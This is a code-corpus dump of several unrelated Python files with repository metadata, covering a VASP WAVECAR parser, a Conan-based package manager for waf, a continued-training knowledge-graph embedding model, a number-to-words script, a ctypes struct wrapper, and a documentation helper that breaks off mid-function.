2021-06-13T09:13:01.000Z
|
2021-06-13T09:13:01.000Z
|
aiida_vasp/parsers/file_parsers/wavecar.py
|
muhrin/aiida-vasp
|
641fdc2ccd40bdd041e59af1fa3e1dcf9b037415
|
[
"MIT"
] | null | null | null |
aiida_vasp/parsers/file_parsers/wavecar.py
|
muhrin/aiida-vasp
|
641fdc2ccd40bdd041e59af1fa3e1dcf9b037415
|
[
"MIT"
] | null | null | null |
"""
WAVECAR parser.
---------------
The file parser that handles the parsing of WAVECAR files.
"""
from aiida_vasp.parsers.file_parsers.parser import BaseFileParser
from aiida_vasp.parsers.node_composer import NodeComposer
class WavecarParser(BaseFileParser):
"""Add WAVECAR as a single file node."""
PARSABLE_ITEMS = {
'wavecar': {
'inputs': [],
'name': 'wavecar',
'prerequisites': []
},
}
def __init__(self, *args, **kwargs):
super(WavecarParser, self).__init__(*args, **kwargs)
self._wavecar = None
self.init_with_kwargs(**kwargs)
def _parse_file(self, inputs):
"""Create a DB Node for the WAVECAR file."""
result = inputs
result = {}
wfn = self._data_obj.path
if wfn is None:
return {'wavecar': None}
result['wavecar'] = wfn
return result
@property
def wavecar(self):
if self._wavecar is None:
composer = NodeComposer(file_parsers=[self])
self._wavecar = composer.compose('vasp.wavefun')
return self._wavecar
| 25.2
| 65
| 0.591711
| 121
| 1,134
| 5.347107
| 0.429752
| 0.068006
| 0.040185
| 0.061824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 1,134
| 44
| 66
| 25.772727
| 0.798765
| 0.145503
| 0
| 0
| 0
| 0
| 0.066246
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.071429
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee0f6bdca365641ee9474e0436ab4c38b5187dad
| 4,184
|
py
|
Python
|
waflib/package.py
|
fannymagnet/cwaf
|
60510f3596f1ee859ea73a50ee56dd636cde14b4
|
[
"Apache-2.0"
] | null | null | null |
waflib/package.py
|
fannymagnet/cwaf
|
60510f3596f1ee859ea73a50ee56dd636cde14b4
|
[
"Apache-2.0"
] | null | null | null |
waflib/package.py
|
fannymagnet/cwaf
|
60510f3596f1ee859ea73a50ee56dd636cde14b4
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python
# encoding: utf-8
import re
import os
import subprocess
import json
class Package:
def __init__(self) -> None:
self.manager = ""
self.name = ""
self.version = ""
def toString(self):
print('package manager:' + self.manager)
print('package name:' + self.name)
print('package version:' + self.version)
class PackageRepo:
def __init__(self) -> None:
self.packages = {}
self.include_dirs = []
self.lib_dirs = []
self.stlibs = []
self.shlibs = []
def installPackages(self, packages):
pass
class PackageManager:
def __init__(self) -> None:
self.package_repos = {}
self.packages = {}
self.include_dirs = ['.']
self.lib_dirs = ['.']
self.stlibs = []
self.shlibs = []
self.add_package_repo("conan", ConanRepo)
def add_package_repo(self, name, repo_type):
self.package_repos[name] = repo_type()
def add_requires(self, *args):
pkgs = []
for arg in args:
match_result = re.match(r'(.*)::(.*)/(.*)', arg)
pkg = Package()
pkg.manager = match_result.group(1)
pkg.name = match_result.group(2)
pkg.version = match_result.group(3)
pkgs.append(pkg)
self.addPackages(pkgs)
# TODO: call this in the end
self.installPackages()
def addPackage(self, package):
if package.manager in self.packages:
self.packages[package.manager].append(package)
else:
self.packages[package.manager] = [package]
def addPackages(self, packages):
for package in packages:
self.addPackage(package)
def installPackages(self):
for k, v in self.packages.items():
if k in self.package_repos:
repo = self.package_repos[k]
repo.installPackages(v)
for include_dir in repo.include_dirs:
self.include_dirs.append(include_dir)
for lib_dir in repo.lib_dirs:
self.lib_dirs.append(lib_dir)
for stlib in repo.stlibs:
self.stlibs.append(stlib)
for shlib in repo.shlibs:
self.shlibs.append(shlib)
else:
print("unsupported packaged manager: " + k)
continue
class ConanRepo(PackageRepo):
def __init__(self) -> None:
PackageRepo.__init__(self)
def installPackages(self, packages):
# gen conanfile.txt
conanfile_content = '[requires]\n'
for package in packages:
conanfile_content += package.name + '/' + package.version + '\n'
conanfile_content += '[generators]\njson'
print(conanfile_content)
self.installConanPackages(conanfile_content)
def installConanPackages(self, conanfile_content):
if not os.path.exists("tmp"):
os.makedirs("tmp")
os.curdir = os.getcwd()
os.chdir('tmp')
with open('conanfile.txt', 'w') as f:
f.write(conanfile_content)
cmd = "conan install . --build=missing"
subprocess.run(cmd)
with open('conanbuildinfo.json') as f:
data = json.loads(f.read())
options = data['options']
deps = data['dependencies']
for dep in deps:
print(dep['name'])
pkg_include_dirs = dep['include_paths']
for pkg_include_dir in pkg_include_dirs:
self.include_dirs.append(pkg_include_dir)
pkg_lib_dirs = dep['lib_paths']
for pkg_lib_dir in pkg_lib_dirs:
self.lib_dirs.append(pkg_lib_dir)
pkg_libs = dep['libs']
for pkg_lib in pkg_libs:
if options[pkg_lib]['shared'] == 'False':
self.stlibs.append(pkg_lib)
else:
self.shlibs.append(pkg_lib)
os.chdir(os.curdir)
print("install conan packages finished")
| 28.462585
| 76
| 0.546845
| 452
| 4,184
| 4.884956
| 0.247788
| 0.048913
| 0.019928
| 0.027174
| 0.144022
| 0.103261
| 0.052536
| 0.052536
| 0.052536
| 0.052536
| 0
| 0.001459
| 0.344885
| 4,184
| 146
| 77
| 28.657534
| 0.804086
| 0.019598
| 0
| 0.158879
| 0
| 0
| 0.07176
| 0
| 0
| 0
| 0
| 0.006849
| 0
| 1
| 0.121495
| false
| 0.009346
| 0.037383
| 0
| 0.196262
| 0.065421
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee0fd6c103aa5c0dda88b9b7d6ada7be67c461d9
| 16,951
|
py
|
Python
|
excut/embedding/ampligraph_extend/EmbeddingModelContinue.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | 5
|
2020-11-17T19:59:49.000Z
|
2021-09-23T23:10:39.000Z
|
excut/embedding/ampligraph_extend/EmbeddingModelContinue.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
excut/embedding/ampligraph_extend/EmbeddingModelContinue.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
from copy import deepcopy
import numpy as np
import tensorflow as tf
from ampligraph.datasets import NumpyDatasetAdapter, AmpligraphDatasetAdapter
from ampligraph.latent_features import SGDOptimizer, constants
from ampligraph.latent_features.initializers import DEFAULT_XAVIER_IS_UNIFORM
from ampligraph.latent_features.models import EmbeddingModel
from ampligraph.latent_features.models.EmbeddingModel import ENTITY_THRESHOLD
from sklearn.utils import check_random_state
from tqdm import tqdm
from excut.utils.logging import logger
class EmbeddingModelContinue(EmbeddingModel):
def __init__(self, k=constants.DEFAULT_EMBEDDING_SIZE, eta=constants.DEFAULT_ETA, epochs=constants.DEFAULT_EPOCH,
batches_count=constants.DEFAULT_BATCH_COUNT, seed=constants.DEFAULT_SEED, embedding_model_params={},
optimizer=constants.DEFAULT_OPTIM, optimizer_params={'lr': constants.DEFAULT_LR},
loss=constants.DEFAULT_LOSS, loss_params={}, regularizer=constants.DEFAULT_REGULARIZER,
regularizer_params={}, initializer=constants.DEFAULT_INITIALIZER,
initializer_params={'uniform': DEFAULT_XAVIER_IS_UNIFORM}, large_graphs=False,
verbose=constants.DEFAULT_VERBOSE):
logger.warning('entities min_quality %i' % ENTITY_THRESHOLD)
super(EmbeddingModelContinue, self).__init__(k, eta, epochs, batches_count, seed, embedding_model_params,
optimizer, optimizer_params, loss,
loss_params, regularizer, regularizer_params, initializer,
initializer_params, large_graphs,
verbose)
self.tf_config = tf.ConfigProto(allow_soft_placement=True, device_count={"CPU": 40},
inter_op_parallelism_threads=40, intra_op_parallelism_threads=1)
def copy_old_model_params(self, old_model):
if not old_model.is_fitted:
raise Exception('Old Model os not Fitted!')
self.ent_to_idx = deepcopy(old_model.ent_to_idx)
self.rel_to_idx = deepcopy(old_model.rel_to_idx)
# self.is_fitted = old_model_params['is_fitted']
# is_calibrated = old_model_params['is_calibrated']
old_model_params = dict()
old_model.get_embedding_model_params(old_model_params)
copied_params = deepcopy(old_model_params)
self.restore_model_params(copied_params)
def fit(self, X, early_stopping=False, early_stopping_params={}, continue_training=False):
"""Train an EmbeddingModel (with optional early stopping).
The model is trained on a training set X using the training protocol
described in :cite:`trouillon2016complex`.
Parameters
----------
X : ndarray (shape [n, 3]) or object of AmpligraphDatasetAdapter
Numpy array of training triples OR handle of Dataset adapter which would help retrieve data.
early_stopping: bool
Flag to enable early stopping (default:``False``)
early_stopping_params: dictionary
Dictionary of hyperparameters for the early stopping heuristics.
The following string keys are supported:
- **'x_valid'**: ndarray (shape [n, 3]) or object of AmpligraphDatasetAdapter :
Numpy array of validation triples OR handle of Dataset adapter which
would help retrieve data.
- **'criteria'**: string : criteria for early stopping 'hits10', 'hits3', 'hits1' or 'mrr'(default).
- **'x_filter'**: ndarray, shape [n, 3] : Positive triples to use as filter if a 'filtered' early
stopping criteria is desired (i.e. filtered-MRR if 'criteria':'mrr').
Note this will affect training time (no filter by default).
If the filter has already been set in the adapter, pass True
- **'burn_in'**: int : Number of epochs to pass before kicking in early stopping (default: 100).
- **check_interval'**: int : Early stopping interval after burn-in (default:10).
- **'stop_interval'**: int : Stop if criteria is performing worse over n consecutive checks (default: 3)
- **'corruption_entities'**: List of entities to be used for corruptions. If 'all',
it uses all entities (default: 'all')
- **'corrupt_side'**: Specifies which side to corrupt. 's', 'o', 's+o' (default)
Example: ``early_stopping_params={x_valid=X['valid'], 'criteria': 'mrr'}``
"""
self.train_dataset_handle = None
# try-except block is mainly to handle clean up in case of exception or manual stop in jupyter notebook
# TODO change 0: Update the mapping if there are new entities.
if continue_training:
self.update_mapping(X)
try:
if isinstance(X, np.ndarray):
# Adapt the numpy data in the internal format - to generalize
self.train_dataset_handle = NumpyDatasetAdapter()
self.train_dataset_handle.set_data(X, "train")
elif isinstance(X, AmpligraphDatasetAdapter):
self.train_dataset_handle = X
else:
msg = 'Invalid type for input X. Expected ndarray/AmpligraphDataset object, got {}'.format(type(X))
logger.error(msg)
raise ValueError(msg)
# create internal IDs mappings
# TODO Change 1: fist change to reuse the existing mappings rel_to_idx and ent_to_idx
if not continue_training:
self.rel_to_idx, self.ent_to_idx = self.train_dataset_handle.generate_mappings()
else:
self.train_dataset_handle.use_mappings(self.rel_to_idx, self.ent_to_idx)
prefetch_batches = 1
if len(self.ent_to_idx) > ENTITY_THRESHOLD:
self.dealing_with_large_graphs = True
logger.warning('Your graph has a large number of distinct entities. '
'Found {} distinct entities'.format(len(self.ent_to_idx)))
logger.warning('Changing the variable initialization strategy.')
logger.warning('Changing the strategy to use lazy loading of variables...')
if early_stopping:
raise Exception('Early stopping not supported for large graphs')
if not isinstance(self.optimizer, SGDOptimizer):
raise Exception("This mode works well only with SGD optimizer with decay (read docs for details).\
Kindly change the optimizer and restart the experiment")
if self.dealing_with_large_graphs:
prefetch_batches = 0
# CPU matrix of embeddings
# TODO Change 2.1: do not intialize if continue training
if not continue_training:
self.ent_emb_cpu = self.initializer.get_np_initializer(len(self.ent_to_idx), self.internal_k)
self.train_dataset_handle.map_data()
# This is useful when we re-fit the same model (e.g. retraining in model selection)
if self.is_fitted:
tf.reset_default_graph()
self.rnd = check_random_state(self.seed)
tf.random.set_random_seed(self.seed)
self.sess_train = tf.Session(config=self.tf_config)
# change 2.2 : Do not change batch size with new training data, just use the old (for large KGs)
# if not continue_training:
batch_size = int(np.ceil(self.train_dataset_handle.get_size("train") / self.batches_count))
# else:
# batch_size = self.batch_size
logger.info("Batch Size: %i" % batch_size)
# dataset = tf.data.Dataset.from_tensor_slices(X).repeat().batch(batch_size).prefetch(2)
if len(self.ent_to_idx) > ENTITY_THRESHOLD:
logger.warning('Only {} embeddings would be loaded in memory per batch...'.format(batch_size * 2))
self.batch_size = batch_size
# TODO change 3: load model from trained params if continue instead of re_initialize the ent_emb and rel_emb
if not continue_training:
self._initialize_parameters()
else:
self._load_model_from_trained_params()
dataset = tf.data.Dataset.from_generator(self._training_data_generator,
output_types=(tf.int32, tf.int32, tf.float32),
output_shapes=((None, 3), (None, 1), (None, self.internal_k)))
dataset = dataset.repeat().prefetch(prefetch_batches)
dataset_iterator = tf.data.make_one_shot_iterator(dataset)
# init tf graph/dataflow for training
# init variables (model parameters to be learned - i.e. the embeddings)
if self.loss.get_state('require_same_size_pos_neg'):
batch_size = batch_size * self.eta
loss = self._get_model_loss(dataset_iterator)
train = self.optimizer.minimize(loss)
# Entity embeddings normalization
normalize_ent_emb_op = self.ent_emb.assign(tf.clip_by_norm(self.ent_emb, clip_norm=1, axes=1))
self.early_stopping_params = early_stopping_params
# early stopping
if early_stopping:
self._initialize_early_stopping()
self.sess_train.run(tf.tables_initializer())
self.sess_train.run(tf.global_variables_initializer())
try:
self.sess_train.run(self.set_training_true)
except AttributeError:
pass
normalize_rel_emb_op = self.rel_emb.assign(tf.clip_by_norm(self.rel_emb, clip_norm=1, axes=1))
if self.embedding_model_params.get('normalize_ent_emb', constants.DEFAULT_NORMALIZE_EMBEDDINGS):
self.sess_train.run(normalize_rel_emb_op)
self.sess_train.run(normalize_ent_emb_op)
epoch_iterator_with_progress = tqdm(range(1, self.epochs + 1), disable=(not self.verbose), unit='epoch')
# print("before epochs!")
# print(self.sess_train.run(self.ent_emb))
# print(self.sess_train.run(self.rel_emb))
for epoch in epoch_iterator_with_progress:
losses = []
for batch in range(1, self.batches_count + 1):
feed_dict = {}
self.optimizer.update_feed_dict(feed_dict, batch, epoch)
if self.dealing_with_large_graphs:
loss_batch, unique_entities, _ = self.sess_train.run([loss, self.unique_entities, train],
feed_dict=feed_dict)
self.ent_emb_cpu[np.squeeze(unique_entities), :] = \
self.sess_train.run(self.ent_emb)[:unique_entities.shape[0], :]
else:
loss_batch, _ = self.sess_train.run([loss, train], feed_dict=feed_dict)
if np.isnan(loss_batch) or np.isinf(loss_batch):
msg = 'Loss is {}. Please change the hyperparameters.'.format(loss_batch)
logger.error(msg)
raise ValueError(msg)
losses.append(loss_batch)
if self.embedding_model_params.get('normalize_ent_emb', constants.DEFAULT_NORMALIZE_EMBEDDINGS):
self.sess_train.run(normalize_ent_emb_op)
if self.verbose:
msg = 'Average Loss: {:10f}'.format(sum(losses) / (batch_size * self.batches_count))
if early_stopping and self.early_stopping_best_value is not None:
msg += ' — Best validation ({}): {:5f}'.format(self.early_stopping_criteria,
self.early_stopping_best_value)
logger.debug(msg)
epoch_iterator_with_progress.set_description(msg)
if early_stopping:
try:
self.sess_train.run(self.set_training_false)
except AttributeError:
pass
if self._perform_early_stopping_test(epoch):
self._end_training()
return
try:
self.sess_train.run(self.set_training_true)
except AttributeError:
pass
self._save_trained_params()
self._end_training()
except BaseException as e:
self._end_training()
raise e
def _load_model_from_trained_params(self):
"""Load the model from trained params.
While restoring make sure that the order of loaded parameters match the saved order.
It's the duty of the embedding model to load the variables correctly.
This method must be overridden if the model has any other parameters (apart from entity-relation embeddings).
This function also set's the evaluation mode to do lazy loading of variables based on the number of
distinct entities present in the graph.
"""
# Generate the batch size based on entity length and batch_count
# TODO change 4.1: batch size based on the training data or more generally if it was computed to bigger number
self.batch_size = max(self.batch_size, int(np.ceil(len(self.ent_to_idx) / self.batches_count)))
# logger.warning('entities min_quality inside load model %i' % ENTITY_THRESHOLD)
# logger.warning('_load_model_from_trained_params is it a big graph yet? %s' % self.dealing_with_large_graphs)
if len(self.ent_to_idx) > ENTITY_THRESHOLD:
self.dealing_with_large_graphs = True
logger.warning('Your graph has a large number of distinct entities. '
'Found {} distinct entities'.format(len(self.ent_to_idx)))
logger.warning('Changing the variable loading strategy to use lazy loading of variables...')
logger.warning('Evaluation would take longer than usual.')
if not self.dealing_with_large_graphs:
self.ent_emb = tf.Variable(self.trained_model_params[0], dtype=tf.float32)
else:
self.ent_emb_cpu = self.trained_model_params[0]
# TODO change 4.2: doable the batch size
self.ent_emb = tf.Variable(np.zeros((self.batch_size * 2, self.internal_k)), dtype=tf.float32)
self.rel_emb = tf.Variable(self.trained_model_params[1], dtype=tf.float32)
def update_mapping(self, X):
"""
update entities and relations mappings in continue case
:param X:
:return:
"""
unique_ent = set(np.unique(np.concatenate((X[:, 0], X[:, 2]))))
unique_rel = set(np.unique(X[:, 1]))
new_unique_ent = unique_ent - set(self.ent_to_idx.keys())
new_unique_rel = unique_rel - set(self.rel_to_idx.keys())
if len(new_unique_ent)>0 or len(new_unique_rel)>-0:
logger.warning('Org entities (%i) or relations (%i)' % (len(self.ent_to_idx), len(self.rel_to_idx)))
logger.warning('New entities (%i) or relations (%i)'%(len(new_unique_ent), len(new_unique_rel)))
ent_id_start = max(self.ent_to_idx.values()) + 1
rel_id_start = max(self.rel_to_idx.values()) + 1
new_ent_count = len(new_unique_ent)
new_rel_count = len(new_unique_rel)
self.ent_to_idx.update(dict(zip(new_unique_ent, range(ent_id_start, ent_id_start+new_ent_count))))
self.rel_to_idx.update(dict(zip(new_unique_rel, range(rel_id_start, rel_id_start+new_rel_count))))
# Extend the emebdding vectors themselves with randomly initialized vectors
extend_ent_emb = self.initializer.get_np_initializer(new_ent_count, self.internal_k)
extend_rel_emb = self.initializer.get_np_initializer(new_rel_count, self.internal_k)
self.trained_model_params[0] = np.concatenate([self.trained_model_params[0], extend_ent_emb])
self.trained_model_params[1] = np.concatenate([self.trained_model_params[1], extend_rel_emb])
| 51.21148
| 128
| 0.610583
| 2,019
| 16,951
| 4.881129
| 0.203071
| 0.012684
| 0.012988
| 0.017047
| 0.290309
| 0.188432
| 0.149467
| 0.111923
| 0.096195
| 0.096195
| 0
| 0.006662
| 0.309303
| 16,951
| 330
| 129
| 51.366667
| 0.834985
| 0.2427
| 0
| 0.244565
| 0
| 0
| 0.070311
| 0.004074
| 0
| 0
| 0
| 0.006061
| 0
| 1
| 0.027174
| false
| 0.016304
| 0.059783
| 0
| 0.097826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee1052ee4cf13eb970ced19001be494a24ecb620
| 1,518
|
py
|
Python
|
projects/Happy Times/num2txt.py
|
jsportland/jssmith.biz
|
1184e4c0c011d0b9bfdbe8e813c08c2a9b436fdd
|
[
"MIT"
] | null | null | null |
projects/Happy Times/num2txt.py
|
jsportland/jssmith.biz
|
1184e4c0c011d0b9bfdbe8e813c08c2a9b436fdd
|
[
"MIT"
] | 7
|
2020-06-05T21:15:16.000Z
|
2021-09-22T18:43:04.000Z
|
projects/Happy Times/num2txt.py
|
jsportland/jsportland.github.io
|
1184e4c0c011d0b9bfdbe8e813c08c2a9b436fdd
|
[
"MIT"
] | null | null | null |
# num2txt.py
# Jeff Smith
'''
Convert a given number into its text representation.
e.g. 67 becomes 'sixty-seven'. Handle numbers from 0-99.
'''
# Create dictionaries of number-text key pairs
ones = {0: '', 1: 'one', 2: 'two', 3: 'three', 4: 'four',
5: 'five', 6: 'six', 7: 'seven', 8: 'eight', 9: 'nine'}
twos = {10: 'ten', 11: 'eleven', 12: 'twelve', 13: 'thirteen', 14: 'fourteen',
15: 'fifteen', 16: 'sixteen', 17: 'seventeen', 18: 'eighteen', 19: 'nineteen'}
tens = {0: '', 1: '', 2: 'twenty', 3: 'thirty', 4: 'forty',
5: 'fifty', 6: 'sixty', 7: 'seventy', 8: 'eighty', 9: 'ninety'}
huns = {0: '', 1: 'one hundred', 2: 'two hundred', 3: 'three hundred', 4: 'four hundred',
5: 'five hundred', 6: 'six hundred', 7: 'seven hundred', 8: 'eight hundred', 9: 'nine hundred'}
# Obtain input from console
num = int(input('Enter a number 0-999: '))
def textnum(num):
# Iterate through dictionaries for text matches to input
# Return text representations
if num == 0:
return 'zero'
elif num > 0 and num <= 9:
return ones[num]
elif num >= 10 and num <= 19:
return twos[num]
elif num >= 20 and num <= 99:
n1 = num // 10
n2 = num % 10
return tens[n1] + '-' + ones[n2]
elif num >= 100 and num < 1000:
n1 = num % 1000 // 100
n2 = num % 100 // 10
n3 = num % 10
return(f"{ones[n1]} hundred, {tens[n2]}-{ones[n3]}")
else:
print("Number out of range")
print(textnum(num))
| 31.625
| 103
| 0.550725
| 220
| 1,518
| 3.8
| 0.490909
| 0.033493
| 0.011962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094897
| 0.264163
| 1,518
| 47
| 104
| 32.297872
| 0.653536
| 0.188406
| 0
| 0
| 0
| 0
| 0.284893
| 0.017241
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0
| 0
| 0.178571
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee1117aa879343fdc2d1539ab537208c88466d45
| 1,811
|
py
|
Python
|
src/pointers/struct.py
|
ZeroIntensity/pointers.py
|
c41b0a131d9d538130cf61b19be84c6cdf251cb7
|
[
"MIT"
] | 461
|
2022-03-10T03:05:30.000Z
|
2022-03-31T17:53:32.000Z
|
src/pointers/struct.py
|
ZeroIntensity/pointers.py
|
c41b0a131d9d538130cf61b19be84c6cdf251cb7
|
[
"MIT"
] | 7
|
2022-03-11T03:55:01.000Z
|
2022-03-23T20:34:21.000Z
|
src/pointers/struct.py
|
ZeroIntensity/pointers.py
|
c41b0a131d9d538130cf61b19be84c6cdf251cb7
|
[
"MIT"
] | 8
|
2022-03-10T19:30:37.000Z
|
2022-03-23T20:35:11.000Z
|
import ctypes
from typing import get_type_hints, Any
from abc import ABC
from .c_pointer import TypedCPointer, attempt_decode
from contextlib import suppress
class Struct(ABC):
"""Abstract class representing a struct."""
def __init__(self, *args, **kwargs):
hints = get_type_hints(self.__class__)
self._hints = hints
class _InternalStruct(ctypes.Structure):
_fields_ = [
(name, TypedCPointer.get_mapped(typ))
for name, typ in hints.items() # fmt: off
]
self._struct = _InternalStruct(*args, **kwargs)
do_sync = kwargs.get("do_sync")
if (kwargs.get("do_sync") is None) or (do_sync):
self._sync()
@property
def _as_parameter_(self) -> ctypes.Structure:
return self._struct
@classmethod
def from_existing(cls, struct: ctypes.Structure):
instance = cls(do_sync=False)
instance._struct = struct
instance._sync()
return instance
def __getattribute__(self, name: str):
attr = super().__getattribute__(name)
with suppress(AttributeError):
hints = super().__getattribute__("_hints")
if (name in hints) and (type(attr)) is bytes:
attr = attempt_decode(attr)
return attr
def __setattr__(self, name: str, value: Any):
if hasattr(self, "_struct"):
self._struct.__setattr__(name, value)
super().__setattr__(name, value)
def _sync(self):
for name in self._hints:
setattr(self, name, getattr(self._struct, name))
def __repr__(self) -> str:
return f"<struct {self.__class__.__name__} at {hex(ctypes.addressof(self._struct))}>" # noqa
| 29.688525
| 102
| 0.59746
| 200
| 1,811
| 5.02
| 0.35
| 0.059761
| 0.023904
| 0.02988
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29873
| 1,811
| 60
| 103
| 30.183333
| 0.790551
| 0.028713
| 0
| 0
| 0
| 0.023256
| 0.060284
| 0.037234
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162791
| false
| 0
| 0.116279
| 0.046512
| 0.418605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee12205ea3c9735342c4affa7e463d604044c45b
| 7,062
|
py
|
Python
|
docs/html_docs/get_classes_in_file.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | 293
|
2015-03-22T20:22:01.000Z
|
2022-03-14T20:28:24.000Z
|
docs/html_docs/get_classes_in_file.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | 512
|
2015-03-14T18:39:27.000Z
|
2022-03-31T16:15:43.000Z
|
docs/html_docs/get_classes_in_file.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | 136
|
2015-03-19T03:26:06.000Z
|
2022-03-25T22:14:54.000Z
|
from __future__ import print_function, unicode_literals
import os
from io import open
from pyNastran.utils.log import get_logger2
import shutil
IGNORE_DIRS = ['src', 'dmap', 'solver', '__pycache__',
'op4_old', 'calculix', 'bars', 'case_control',
'pch', 'old', 'solver', 'test', 'dev', 'bkp', 'bdf_vectorized']
MODS_SKIP = ['spike', 'shell_backup']
SKIP_DIRECTORIES = ['.svn', '.idea', '.settings', '.git', 'test', 'bkp', '__pycache__', 'dev',
'htmlcov', 'vtk_examples', 'SnakeRiverCanyon', 'M100', 'SWB']
SKIP_FILE_SUFFIX = [
'.pyc', '.pyx', # python
'.bdf', '.op2', '.f06', '.op4', '.dat', '.inp', # nastran
'.err', '.log', '.rej', '.db', '.db.jou', '.ses', '.ses.01', # patran
'.pptx',
'.png', '.gif', # pictures
'.txt', '.csv', '.out', '.coverage', '.whl', # generic
'.mapbc', '.front', '.flo', 'cogsg', '.bc', '.d3m', '.inpt', '.nml', # usm3d/fun3d
'.ele', '.node', '.smesh', '.off',
'.mk5', '.wgs', '.stl', '.fgrid', '.su2', '.obj', # other formats
'.tri', '.cntl', '.c3d', # cart3d
'.surf', '.tags', '.ugrid', '.bedge', # aflr
'.plt', # tecplot
'.p3d',
'.tex', '.bib', # latex
]
MAKE_FILES = True
def get_folders_files(dirname, skip_file_suffix=None, skip_directories=None):
"""
Return list of directories and files in a given tree path. By default discards:
* directories ".svn", ".idea", ".settings"
* files that ends with ".pyc", .pyx", ".bdf"
"""
if skip_directories is None:
skip_directories = SKIP_DIRECTORIES
if skip_file_suffix is None:
skip_file_suffix = tuple(SKIP_FILE_SUFFIX)
dirname = os.path.join(dirname)
files = []
folders = []
for root, dirs, filenames in os.walk(dirname):
folders.append(root)
for filename in filenames:
if filename.endswith(skip_file_suffix):
continue
if 'test_' in os.path.basename(filename):
continue
files.append(os.path.join(root, filename))
#files += [os.path.join(root, filename) for filename in filenames
#if not filename.endswith(skip_file_suffix)]
dirs[:] = [d for d in dirs if not d in skip_directories]
#if len(dirs):
#print('root = %s' % root)
#print(dirs)
#print('------------------')
return folders, files
def get_classes_functions_in_file(py_filename):
with open(py_filename, 'r', encoding='utf8') as f:
lines = f.readlines()
function_list = []
class_list = []
for line in lines:
line = line.split('#')[0].rstrip()
if line.startswith('class '):
# class ASDF(object):
class_name = line.split('(')[0].split(' ')[1]
is_object = False
if '(object):' in line:
is_object = True
class_list.append((class_name, is_object))
elif line.startswith('def '):
function_name = line.split('(')[0].split(' ')[1]
if function_name.startswith('_'):
continue
function_list.append(function_name)
#for class_name in class_list:
#print(class_name)
return class_list, function_list
def get_pyfilenames():
folders, filenames = get_folders_files('../../pyNastran')
filenames_classes = []
for py_filename in filenames:
py_filename2, dot_path = get_location_filename_for_pyfilename(py_filename)
class_names, function_names = get_classes_functions_in_file(py_filename)
#for class_name, is_object in class_names:
#print(' %s (class)' % class_name)
#for function_name in function_names:
#print(' %s (function)' % function_name)
filenames_classes.append((py_filename, py_filename2, dot_path, class_names))
return filenames_classes
def get_location_filename_for_pyfilename(py_filename):
"""../../pyNastran/utils/nastran_utils.py -> pyNastran/utils/nastran_utils.py"""
path = py_filename.lstrip('../\\')
no_py = os.path.splitext(path)[0]
dot_path = no_py.replace('\\', '.').replace('/', '.')
#print(dot_path)
return path, dot_path
def filenames_to_rsts(filenames_classes, make_rsts=False):
for py_filename, py_filename2, dot_path, class_names in filenames_classes:
if not class_names:
continue
base_folder = os.path.dirname(py_filename2)
#print('%-20s %s %s' % (base_folder[:20], py_filename2, dot_path))
folder = os.path.join('rsts', base_folder)
if 'cards' in folder:
while not folder.endswith('cards'):
folder = os.path.dirname(folder)
if not os.path.exists(folder):
os.makedirs(folder)
rst_filename = os.path.join(folder, 'index.rst')
mode = 'w'
rst_lines = '.. toctree::\n\n'
if os.path.exists(rst_filename):
rst_lines = ''
mode = 'a'
for class_name, is_object in class_names:
create_rst_file_for_class(folder, dot_path, class_name, is_object)
print(' %s' % str(class_name))
#pyNastran.bdf.cards.aset
rst_lines += ' %s.%s\n' % (dot_path, class_name)
#print(rst_lines)
with open(rst_filename, mode) as rst_file:
rst_file.write(rst_lines)
def create_rst_file_for_class(folder, dot_path, class_name, is_object):
split_path = dot_path.split('.')
split_path[-1] += '.rst'
#rst_filename = os.path.join(*split_path)
